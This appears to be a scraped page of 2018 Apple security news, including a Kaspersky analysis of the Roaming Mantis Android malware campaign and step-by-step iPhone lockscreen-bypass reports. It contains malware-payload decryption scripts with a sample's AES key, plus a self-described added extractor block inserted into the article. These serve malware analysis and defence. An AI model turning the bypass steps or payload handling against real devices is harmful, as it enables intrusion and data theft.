- Apple -

Last update 09.10.2017 13:46:27


Apple Tells Congress Chinese Spy Chip Story Is False
10.10.2018 securityweek

The recent Bloomberg story claiming that Chinese spy chips made it into servers sold by California-based Super Micro is "simply wrong," Apple said in a letter sent on Monday to Congress.

The tech giant has denied claims that its servers were compromised and noted that its internal investigations have not found any evidence to support the Bloomberg report. The company also pointed out that some of the allegations from the article are based on a single anonymous source.

"While the story was being reported, we spoke with Bloomberg’s reporters and editors and answered any and all of their questions. We methodically dispelled the often-shifting nature of their claims. While we repeatedly asked them to share specific details about the alleged malicious chips that they seemed certain existed, they were unwilling or unable to provide anything more than vague secondhand accounts," wrote George Stathakopoulos, Apple's VP for information security.

"We were struck by the fact that the gravity and magnitude of the claims seemed to be undermined by their uncertainty around key details. Nevertheless, we worked tirelessly to ascertain whether these claims were true or, failing that, if anything even like them were true," he added.

Apple has denied finding any malicious chips or hardware manipulations, or contacting the FBI regarding such concerns, as claimed by Bloomberg.

The article describing the Chinese spy chips said the compromised devices were making outbound connections, and Apple is confident that its security systems would have detected this type of traffic.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations, including government agencies and tech giants such as Apple and Amazon.

The report, based on information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Amazon and Super Micro have also strongly denied the claims, and their statements have been backed up by security agencies in the United States and the United Kingdom.

While some experts believe the attack described by Bloomberg is technically possible, others, including one of the people cited in the controversial article, have raised doubts.

Apple Patches Passcode Bypass in iOS
10.10.2018 securityweek

Apple on Monday released patches for iOS devices to address a recently disclosed vulnerability that could result in the bypass of the lockscreen.

The issue was found by iPhone enthusiast Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” who revealed several other passcode bypass techniques in the past.

Exploitation requires both physical access to the device and for Siri to be enabled and Face ID to be disabled.

Once these conditions are met, an attacker can ask Siri to enable the VoiceOver accessibility feature that helps visually impaired individuals to use their Apple device by having the content of the screen and selected buttons read out to them.

The attacker can then call the locked device so that the “Messages” icon appears on the screen, to trigger a notification, and then bring up a white page with hidden buttons and functions. By abusing VoiceOver to cycle through the functions, the attacker can then access contacts and photos stored on the device.

The Cupertino-based tech giant has released iOS 12.0.1 to address the issue, which is actually the result of two vulnerabilities in the operating system.

Tracked as CVE-2018-4380, the first bug impacts VoiceOver. “A lock screen issue allowed access to photos and contacts on a locked device,” Apple notes in its advisory.

The second flaw, CVE-2018-4379, affects Quick Look: “A lock screen issue allowed access to the share function on a locked device,” Apple says.

Thus, the new platform update includes two patches, both available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. To address the vulnerabilities, the patches restrict the options offered on a locked device.

Also on Monday, Apple released iCloud for Windows 7.7 to address 19 vulnerabilities in WebKit, including memory corruptions, arbitrary code execution, unexpected cross-origin behavior, script execution, and an ASSERT failure. The update is available for Windows 7 and later.

Google Criticizes Apple Over Safari Security, Flaw Disclosures
8.10.2018 securityweek

One Year After Release, Google Fuzzer Still Finds Many Flaws in Safari

One year after it was released as open source by Google Project Zero, the Domato fuzzer has still found a significant number of vulnerabilities in Apple's Safari web browser.

In September 2017, Google Project Zero researcher Ivan Fratric announced the release of a new Document Object Model (DOM) fuzzer designed for testing web browser engines. At the time, he revealed that Domato had helped him find more than 30 vulnerabilities, including two flaws in Chrome’s Blink engine, four in Firefox’s Gecko, four in Internet Explorer’s Trident, six in EdgeHtml, and 17 in Safari’s WebKit.

Since the highest number of security holes was found in WebKit, Fratric recently decided to once again test it to see if any improvements have been made by Apple.

Using the same type of testing (running 100 million iterations on computing power that could be purchased for roughly $1,000), Fratric uncovered nine new vulnerabilities, including six in what at the time was the current version of Safari. The researcher also noticed that most of the bugs had been present in the WebKit code for more than six months before they were discovered.

"While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into an account that the fuzzer has been public for a long time now," Fratric said in a blog post.

In an effort to demonstrate the risk posed by the types of flaws identified using the Domato fuzzer, Fratric created an exploit for one of the use-after-free issues – these types of bugs can in many cases allow arbitrary code execution.

The expert reported his findings to Apple in June and July, and patches were released in September. However, Fratric has criticized the tech giant for not disclosing the existence of the vulnerabilities in the initial version of its advisories.

Specifically, Apple resolved the flaws with the release of iOS 12, tvOS 12 and Safari 12 on September 17, but did not mention them in its advisories. Instead, the company added information about the security bugs to its initial advisories only on September 24, when it also released updates and advisories for macOS Mojave 10.14.

"The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on MacOS before adding them. However, this practice is misleading because customers interested in the Apple security advisories would most likely read them only once, when they are first released, and the impression they would get is that the product updates fix far less vulnerabilities and less severe vulnerabilities than is actually the case," Fratric said.

"Furthermore, the practice of not publishing fixes for mobile or desktop operating systems at the same time can put the desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while the desktop customers would have no way to update and protect themselves," he added.

Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system
5.10.2018 Kaspersky

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, covering countries in Asia, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

Roaming Mantis uses DNS hijacking to infect Android smartphones (April 2018)
Roaming Mantis dabbles in mining and phishing multilingually (May 2018)

In addition, we would like to thank and credit the security researchers from LAC Co. Ltd. for a very insightful article, published in their Japanese blogpost in June 2018, describing how vulnerable routers were compromised by the Roaming Mantis group. According to this research, on routers whose control panel was accessible over the Internet, the threat actor logged in using the default ID and password and replaced the legitimate DNS settings with rogue DNS settings.

The Roaming Mantis group did not stop its activities after the publication of our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods, such as web crypto-mining for iOS devices, spreading via a malicious content delivery system, and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

Web crypto-mining for iOS devices
The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

Part of HTML source code of the malicious landing page for iOS

The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

Screen capture of the landing page and CPU monitoring tool

Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

Filtering Japanese devices
One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. A new feature was added to the landing page to filter out Japanese environments:

Added confirmation of Japanese environment for filtering

It looks like they want to slow down infections of Japanese targets for the time being.

Spreading via another malware delivery system
In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

Our deeper investigation revealed that their new malware spreading method was the one used by other Android malware: the “sagawa.apk” delivery system. We published a Japanese blogpost about this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector was a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL. If the user clicked it, the server displayed a fake web site that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

                             | Type A                                    | Type B
File name                    | sagawa.apk                                | sagawa.apk
md5                          | 956f32a28d0057805c7234d6a13aa99b          | a19f4cb93274c949e66efe13173c95e6
File size                    | 427KB (437,556)                           | 2.3MB (2,381,665)
Loader module                | \classes.dex                              | \classes.dex +
Encrypted payload (enc_data) | \assets\a                                 | \assets\code.so
Decrypt algorithm            | payload = base64_dec(zlib_dec(enc_data)); | aes_key = base64_dec(hardcoded data); payload = AES_dec(enc_data, aes_key);
Alias                        | MoqHao (McAfee), XLoader (TrendMicro)     | FAKESPY (TrendMicro)
Old file name                | facebook.apk, ${random}.apk               | sagawa.apk

Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

Japanese messages displayed to infected users

In addition, this malware confirms whether a domestic Japanese prepaid card application is installed on the infected device.

Check for the domestic Japanese prepaid card application “Au Wallet”

If the application is installed on the device, the malware downloads and installs a fake application as its update.

Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

Researchers may use the following simplified Python scripts to extract the payload from “sagawa.apk”. Each script takes the encrypted asset as its first argument and writes the decrypted payload next to it with a ".dec" suffix.

Type A (\assets\a):

#!/usr/bin/env python

import sys
import zlib
import base64

# Type A scheme: payload = base64_dec(zlib_dec(enc_data)), yielding a dex file
data = open(sys.argv[1], "rb").read()
dec_z = zlib.decompress(data)
dec_b = base64.b64decode(dec_z)

with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec_b)

Type B (\assets\code.so):

#!/usr/bin/env python

import sys
import base64
from Crypto.Cipher import AES

# Type B scheme: aes_key = base64_dec(hardcoded data); payload = AES_dec(enc_data, aes_key), yielding a jar file
data = open(sys.argv[1], "rb").read()
key = sys.argv[2]  # key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
aes_key = base64.b64decode(key)
aes = AES.new(aes_key, AES.MODE_ECB)  # ECB is what PyCrypto's AES.new(key) defaulted to; stated explicitly here
dec = aes.decrypt(data)

with open(sys.argv[1] + ".dec", "wb") as fp:
    fp.write(dec)

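The two decryption schemes from the table above can be folded into a single triage tool that reads the APK itself, picks the scheme from the archive layout and validates the result against dex/jar magic bytes. This is an added example, not Kaspersky's code; it assumes the in-archive paths assets/a, assets/code.so and lib/<abi>/libkao.so, that Type B's AES mode is ECB (the PyCrypto default the page's script relied on), and it builds its sample APKs inline.

```python
#!/usr/bin/env python3
"""Triage and payload extraction for the Type A / Type B sagawa.apk loaders.
Added example; path layout and ECB mode are assumptions, samples are constructed."""
import base64
import io
import zipfile
import zlib

DEX_MAGIC = b"dex\n"        # every .dex file starts with "dex\n" + version
ZIP_MAGIC = b"PK\x03\x04"   # a .jar payload is a zip container
TYPE_A_ASSET = "assets/a"          # assumed APK-internal path of \assets\a
TYPE_B_ASSET = "assets/code.so"    # assumed APK-internal path of \assets\code.so
TYPE_B_NATIVE = "libkao.so"        # Type B ships lib/<abi>/libkao.so (holds the key)


def classify_apk(apk_bytes):
    """Return "A", "B" or None based on which loader artefacts the APK carries."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = set(zf.namelist())
    if TYPE_A_ASSET in names:
        return "A"
    if TYPE_B_ASSET in names and any(n.endswith(TYPE_B_NATIVE) for n in names):
        return "B"
    return None


def decrypt_type_a(enc_data):
    """Type A: payload = base64_dec(zlib_dec(enc_data))."""
    return base64.b64decode(zlib.decompress(enc_data))


def decrypt_type_b(enc_data, b64_key):
    """Type B: aes_key = base64_dec(hardcoded); payload = AES_dec(enc_data, aes_key).
    Needs pycryptodome; ECB mode is an assumption (PyCrypto's old default)."""
    from Crypto.Cipher import AES  # imported lazily so Type A works without it
    aes_key = base64.b64decode(b64_key)
    if len(enc_data) % AES.block_size:
        raise ValueError("ciphertext length is not a multiple of the AES block size")
    return AES.new(aes_key, AES.MODE_ECB).decrypt(enc_data)


def payload_kind(data):
    """Sanity-check a decrypted blob: the write-up reports a dex (A) or a jar (B)."""
    if data.startswith(DEX_MAGIC):
        return "dex"
    if data.startswith(ZIP_MAGIC):
        return "jar"
    return "unknown"


def extract_payload(apk_bytes, b64_key=None):
    """Pick the asset and routine for this loader type; return (loader_type, payload)."""
    kind = classify_apk(apk_bytes)
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        if kind == "A":
            payload = decrypt_type_a(zf.read(TYPE_A_ASSET))
        elif kind == "B":
            if b64_key is None:
                raise ValueError("Type B needs the base64 AES key pulled from libkao.so")
            payload = decrypt_type_b(zf.read(TYPE_B_ASSET), b64_key)
        else:
            raise ValueError("not a known sagawa.apk loader layout")
    if payload_kind(payload) == "unknown":
        raise ValueError("decrypted data has neither dex nor jar magic: wrong key or scheme")
    return kind, payload


# Constructed sample data: a fake dex header stands in for the real payload.
FAKE_DEX = DEX_MAGIC + b"035\x00" + b"\x00" * 32 + b"CONSTRUCTED-SAMPLE"


def _build_apk(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_type_a():
    """Constructed Type A style APK: assets/a holds zlib(base64(dex)), the scheme's inverse."""
    enc = zlib.compress(base64.b64encode(FAKE_DEX))
    return _build_apk({"classes.dex": b"loader", TYPE_A_ASSET: enc})


def build_sample_type_b_layout():
    """Constructed Type B layout only (opaque asset, no real AES) to exercise the classifier."""
    return _build_apk({"classes.dex": b"loader", TYPE_B_ASSET: b"\x00" * 32,
                       "lib/arm64-v8a/" + TYPE_B_NATIVE: b"ELF-placeholder"})


if __name__ == "__main__":
    loader, payload = extract_payload(build_sample_type_a())
    print(loader, payload_kind(payload), len(payload))
```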
Spreading via prezi.com like a scam
We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service for creating dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult videos, games, comics, music and so on, typically pirated copies.

Redirection to a scam page

Based on our research, there were multiple messages leveraging different social engineering tricks to lure users to a scam website. The Roaming Mantis landing page, in turn, was found to be linked from several such accounts carrying out redirections.

Corrupted landing page code from Roaming Mantis posted on prezi.com

However, fortunately this code does not work because of mistakes made during the code preparation stage.

Records of stolen data
Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

Suspected stolen data from victims’ Android devices

This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including CVV, bank information, and secret question and answer, with headers in Simplified Chinese. The Chinese data headers suggest that the attackers are fluent in Chinese, unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate the victims’ geography. Below is a pie chart created from the language data:

Victims’ language settings (download)

The top language is “en-us” (39%), the second is “ko-kr”, the third is “ru”. Judging from this data, the victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and the new distribution strategies. The reason “en-us” is the most common could be that English is used as a second language in several countries.

In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. The campaign shows no sign of stopping its development. In our recent research, we found that they experimented with a web miner for iOS instead of redirecting to a fake Apple website.

Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

Judging from the list of stolen credentials, the attackers seem to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe that this is just the tip of the iceberg.

We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

Kaspersky Lab products detect this malware with the following verdict:


Apple Chief Says Firm Guards Data Privacy in China
4.10.2018 securityweek

Apple chief executive Tim Cook on Tuesday said the company is devoted to protecting people's privacy, with data encrypted and locked away on servers even in China.

Cook called privacy one of the most important issues of this century, and maintained that the US-based technology colossus safeguards even the data that Chinese law requires it to keep stored in that country.

"We worked with a Chinese company to provide iCloud," Cook said during an interview with Vice News, referring to Apple's service for storing digital content in the internet cloud.

"But, the keys to the data are ours."

Cook said Apple hosts data on servers in an array of countries, but it is not easy for local authorities to get access. China is known for tight internet controls, prompting worries about the privacy of data stored there by Apple.

When asked about a recent security breach revealed by Facebook, Cook once again championed the importance of protecting people's information in a time when smartphones can reveal so much about them.

Cook has repeatedly stressed that Apple's business model does not involve gathering user data and targeting them with ads, the way internet giants Facebook and Google make money.

"You are not our product," Cook said.

"We don't create a profile and allow other companies to target you. That is not the business we are in."

Apple, valued at more than a trillion dollars based on its share price, makes most of its money from iPhone sales. The Silicon Valley company has been working to ramp up revenue from digital content and online services, such as streaming music and data storage.

Cook said that while he is a fan of the free market, he supports the idea of legislation aimed at protecting people's privacy.

"I think there is a need to work with Congress and the staff to make sure we do our jobs of helping them come up to speed on what's possible," Cook said.

"Technology itself doesn't want to be good. It doesn't want to be bad. It doesn't want to be anything. It is up to the creator."

Passcode Bypass Method Exposes Photos, Contacts on iPhone XS
2.10.2018 securityweek

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.

Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” found several passcode bypass techniques in the past and he has now identified another one.

As with all passcode bypass methods, physical access to the targeted device is required. Another prerequisite is that Siri needs to be enabled and Face ID has to be disabled for the hack to work.

The technique involves asking Siri to enable VoiceOver, an accessibility feature that allows users with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The next step is to call the locked device so that the “Messages” icon appears on the screen. Once the messages menu is opened by selecting the “custom” option, a notification needs to be triggered on the targeted iPhone (e.g. by sending it a text, Facetime or Telegram message). When the notification is displayed, a double tap on the screen reveals a white page that contains hidden buttons and functions.

The VoiceOver feature allows the hacker to navigate through and use these buttons, including to access contacts and photos stored on the phone.

Apple likely intended to keep these buttons hidden while the iPhone was locked, but it appears that they are still visible and usable by the VoiceOver system.

While contact information is easier to obtain, the attacker has to blindly pick which photos from the gallery they want displayed.

The YouTube channel EverythingApplePro, which also published a video confirming the method, reported that the technique even works on iOS 12.1 beta.

SecurityWeek has reached out to Apple to find out if the company is aware of the new security bypass flaw and if it plans on releasing a patch. While in the past the tech giant managed to patch some lockscreen bypass vulnerabilities through server-side changes, the latest method may require an iOS update.

A second video posted by Rodriguez appears to show that the invisible menus can also be accessed by using Siri to create notes and activating the VoiceOver features. This method does not require calling or messaging the targeted phone.

Weak Passwords Abused for 'FruitFly' Mac Malware Distribution
2.10.2018 securityweek

FruitFly, a piece of Mac malware that infected thousands of machines over the course of more than 13 years, was being distributed via poorly protected external services.

First detailed in early 2017, FruitFly (also known as Quimitchin) targeted individuals, companies, schools, a police department, and the U.S. government, including a computer owned by a subsidiary of the Department of Energy.

In January this year, the U.S. Department of Justice indicted Phillip R. Durachinsky, an Ohio resident, for using the malware for more than 13 years for nefarious purposes. The man would abuse FruitFly to steal personal data of unknowing victims and spy on them, and even to produce child pornography.

Durachinsky allegedly leveraged the malware to control the infected machines “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” the DoJ said in January.

While the threat’s capabilities were clear to the researchers who analyzed it, the only thing they couldn’t explain was the infection vector.

A newly discovered “flash alert” (PDF) that the Federal Bureau of Investigation (FBI) sent in March last year, however, solves the mystery: Durachinsky targeted poorly protected external services to install the malware onto his victims’ machines.

“The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches,” the alert reads.

Discovered by Patrick Wardle, co-founder and chief research officer of enterprise macOS security company Digita Security, the document reveals that, in addition to using the malware to spy on victims, Durachinsky was leveraging the infection to target additional systems.

Basically, he scanned the Internet for Macs with exposed ports that he could exploit and then attempted to connect to these systems using weak, known credentials. Once a system was compromised, he then attempted to persistently install the malware.

The targeting of poorly protected remote access protocols for malware installation isn’t a new technique. In fact, there are millions of endpoints exposing ports associated with the Remote Desktop Protocol (RDP) and this type of attack even surpassed spam in popularity among ransomware operators.

Expert demonstrated how to access contacts and photos from a locked iPhone XS
1.10.2018 securityaffairs

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos, contacts on a locked iPhone XS.
The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker (with physical access to the iPhone) to access photos, contacts on a locked iPhone XS and other devices.

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue that allowed images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack abuses VoiceOver, the accessibility feature of the iPhone; for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step by step guide for the Rodriguez’s attack was published by the website Gadget Hacks.

iPhone passcode bypass issues are not uncommon. In September 2015, Jose Rodriguez discovered that the iOS 9.0.1 update failed to address a lock screen bypass vulnerability.

In November 2017, experts discovered a flaw in iOS 8 and newer versions of the Apple OS that allowed bypassing the iPhone Passcode protection, even when Touch ID was properly configured, and access photos and messages stored on the device.

Researchers Find 'Authentication Weakness' in Apple's Device Enrollment Program
28.9.2018 securityweek

Researchers from Duo Security have discovered a vulnerability (they call it an 'authentication weakness') in Apple's Device Enrollment Program (DEP). The flaw was reported to Apple in May 2018. It is not considered to be a major flaw, but could potentially have serious consequences. SecurityWeek has asked Apple if it has or plans to patch or fix the issue.

DEP is used to automatically enroll Apple devices into a company's mobile device management (MDM) server. The MDM is used to manage and configure user devices. DEP makes this enrollment process quick, simple and efficient -- and is a boon to any organization with a large number of mobile devices. "Users," comments Duo, "can unbox their new device and be ready to go on day one. If they purchase devices directly from Apple or an authorized reseller, they can have a zero-touch configuration of the endpoint as it is booted up for the first time."

The issue discovered by Duo resides in an undocumented private DEP API used by Apple devices to request their DEP profile. Retrieving the DEP profile -- which contains information about the organization that owns the device (email address, phone number, postal address and the MDM enrollment number) -- requires only a valid device serial number as authentication: the process assumes that the device sending the serial number is the device that owns the serial number.

"This is problematic," write the researchers in a report published today by Duo Labs, "because an attacker armed with only a valid, DEP-registered serial number can potentially enroll a rogue device into an organization's MDM server, or use the DEP API to glean information from enrolled devices."

The serial numbers are predictable and constructed using a well-known schema. They were never meant to be secret -- just unique. It means that attackers do not have to find inadvertently leaked serial numbers but can instead generate valid serial numbers and use the DEP API to test if they are registered with DEP.

"The main problem here," James Barclay, senior R&D engineer at Duo Security, told SecurityWeek, "is that serial numbers were never meant to be secret. But it's not the end of the world. We don't see this as so much of a problem that people should stop using DEP. The benefits of having devices managed through Apple's MDM and using DEP to make enrollment a smooth process for end users, outweigh the risks."

This flaw doesn't lead directly to a breach situation, but still has its dangers. Those dangers, he continued, depend on how the organization has set up its MDM server. "If the MDM-provided configuration data includes a support desk help number, then the attacker could call support, identify himself with the serial number he already knows, and attempt to socially engineer a more useful position. Potentially more serious, if the MDM is set up to deliver wifi configuration including the wifi password, or perhaps the corporate VPN password, then this will fall into the hands of the attacker."

But there are remediation steps an organization can take regardless of whether Apple does anything. "Primarily," said Barclay, "organizations should implement a requirement for user authentication prior to enrollment with the MDM. If this is not possible, the MDM could simply install a single app at the beginning of the process. The app could require out-of-band user authentication prior to delivering any further configuration. This would minimize any possibility of an attacker enrolling a rogue device."

The problem at the moment is that in many cases customers don't require user authentication prior to MDM enrollment, and they're also deploying things like wifi passwords and VPN configuration data directly through MDM.

The problem might simply go away on future Apple devices. Newer devices include T1 or T2 cryptographic chips, and it would be possible to cryptographically identify individual devices within their Secure Enclave. "This could provide cryptographic assurance of the identity of a given device," write the researchers, "before enrolling it into an organization's MDM server via DEP."

Duo is not aware of any remedial steps being taken or planned by Apple. "We don't know and haven't been told whether Apple has any plans to solve the issue themselves," said Barclay. "We don't know of any direct fixes that have been put in place yet. It's possible that some of the mitigations could be implemented server-side without actually requiring a patch to the endpoint."

This is not the first DEP/MDM flaw to be disclosed. Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Belanger, staff engineer at Dropbox, showed at Black Hat in August 2018 that an MitM could intercept applications being sent from the MDM to the device.

Although SecurityWeek asked Apple for a comment on the latest issue, no response has been received at the time of writing. If we do get a statement, it will be appended to this article. Two days ago, Patrick Wardle (co-founder and chief research officer of enterprise macOS security company Digita Security) disclosed without details a vulnerability in the new Mojave iOS version allowing a malicious app to obtain data from the user's address book without having the necessary permissions.

Cloud-based identity and access management solutions provider Duo Security was acquired by Cisco for $2.35 billion in August 2018. In the previous October, Duo raised $70 million in Series D funding that valued the company at $1.17 billion at that time.

Pangu hackers are back, they achieved the iOS 12 Jailbreak
28.9.2018 securityaffairs

The popular Chinese hacking team Pangu has devised an iOS 12 jailbreak running on the latest iPhone XS. Users are waiting for further details.
Here we go again with the notorious Chinese hacking team Pangu, a group well known for its ability to jailbreak Apple devices. This time the experts presented a jailbreak for iOS 12 running on the latest iPhone XS.

The last jailbreak for Apple iOS devised by the Pangu team was released in October 2015, when the expert published the untethered jailbreak tool for iOS 9.

An iOS jailbreak removes the hardware restrictions implemented by Apple's operating system. Jailbreaking gives users root access to the iOS file system and manager, which allows them to download and install applications and themes from third-party stores.
Jailbreaking mobile devices exposes them to a wide range of threats, including malware such as KeyRaider and YiSpector.
Below is the tweet shared by the researcher Min(Spark) Zheng showing the successful jailbreak of an Apple iPhone XS with the A12 Bionic chip, as announced by one of the Pangu researchers.

The experts pointed out that the iOS 12 jailbreak bypasses the Pointer Authentication Code (PAC) mitigation implemented in Apple's new A12 Bionic chip.

Min(Spark) Zheng
iOS 12 Jailbreak on iPhone XS by @PanguTeam ! Bypass PAC mitigation on the new A12 chip. That's amazing!!!👏👏👏

12:55 PM - Sep 27, 2018
Experts believe the same jailbreak should also work on the iPhone XS Max because of the hardware similarities.


The Pangu group has not yet announced the jailbreak, but many users hope the team will release the iOS 12 jailbreak to the public.

macOS Mojave Patches Vulnerabilities, But New Flaws Already Emerge
25.9.2018 securityweek

Apple on Monday released the latest version of its macOS operating system. macOS Mojave 10.14 introduces some security enhancements and patches several vulnerabilities, but a new flaw has already emerged.

macOS Mojave addresses a total of 8 vulnerabilities affecting components such as Bluetooth, App Store, Application Firewall, Auto Unlock, Crash Reporter, Kernel and Security.

The Bluetooth vulnerability is CVE-2018-5383, which researchers at the Israel Institute of Technology disclosed in July. The flaw can allow an attacker in physical proximity to two targeted devices to monitor and manipulate the traffic they exchange. The issue was previously resolved by Apple in both iOS and macOS High Sierra.

In fact, many of the vulnerabilities mentioned in Apple’s advisory for Mojave security updates were previously patched in iOS.

The list of apparently new flaws patched in the latest macOS version includes an App Store bug that allows a malicious app to determine the Apple ID belonging to the targeted device’s owner (CVE-2018-4324) and an application firewall issue that can be exploited by a sandboxed process to bypass restrictions (CVE-2018-4353).

Interestingly, Apple says macOS Mojave removes support for the RC4 encryption algorithm due to the existence of CVE-2016-1777, an old vulnerability that the tech giant first patched in macOS Sierra back in 2016.

Just hours before Apple released Mojave, security researcher Patrick Wardle published a video apparently showing a potentially serious flaw that can be exploited to bypass some of the operating system’s privacy protections.

Wardle, who is the co-founder and chief research officer of enterprise macOS security company Digita Security, discovered that a malicious application can obtain data from a user’s address book despite not having the necessary permissions. The researcher has not made any technical details public to prevent abuse.

SecurityWeek has reached out to Apple to learn if it’s aware of the issue and will update this article if the company responds.

This is not the first time Wardle has disclosed a vulnerability that can lead to a security bypass and exposure of sensitive information. Last year he found a flaw that could have been exploited by malicious apps to steal passwords from the Keychain, and a method for bypassing the Secure Kernel Extension Loading (SKEL) security feature introduced in macOS High Sierra. The SKEL bypass was disclosed just days before the official release of High Sierra.

White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
25.9.2018 securityaffairs

The popular macOS expert and former NSA hacker has discovered a zero-day vulnerability in macOS on Mojave's release day.
Once again it is Patrick Wardle: this time the popular expert and former NSA hacker has found a zero-day flaw in macOS on Mojave's release day.

According to the expert, the implementation bug can be exploited to access sensitive user data, including information in the address book.

The vulnerability resides in the implementation of the privacy-protection mechanisms for sensitive data.

The user data protection measures introduced in macOS Mojave force users to provide explicit consent before an app can access sensitive data and files (i.e. location services, contacts, calendars, photos).

Applications can no longer do this automatically by simulating human input with synthetic clicks. Apple’s latest OS displays an authorization request for direct user interaction.

In order to improve the user experience, the OS allows the user to pre-authorize the apps that should be allowed to access sensitive data.
This is done by adding them to the system's Application Data category in the System Preferences, Security & Privacy panel.

Wardle was able to access the sensitive data using an unprivileged app.

“I found a trivial, albeit 100% reliable flaw in their implementation,” he told Bleeping Computer.

Wardle explained that the exploitation of the zero-day issue only works on Mojave’s new privacy protection features.

patrick wardle

Mojave's 'dark mode' is gorgeous 🙌
...but its promises about improved privacy protections? kinda #FakeNews 😥

0day bypass:https://vimeo.com/291491984

btw if anybody has a link to 🍎's macOS bug bounty program I'd 💕 to report this & other 0days -donating any payouts to charity 🙏

3:45 PM - Sep 24, 2018
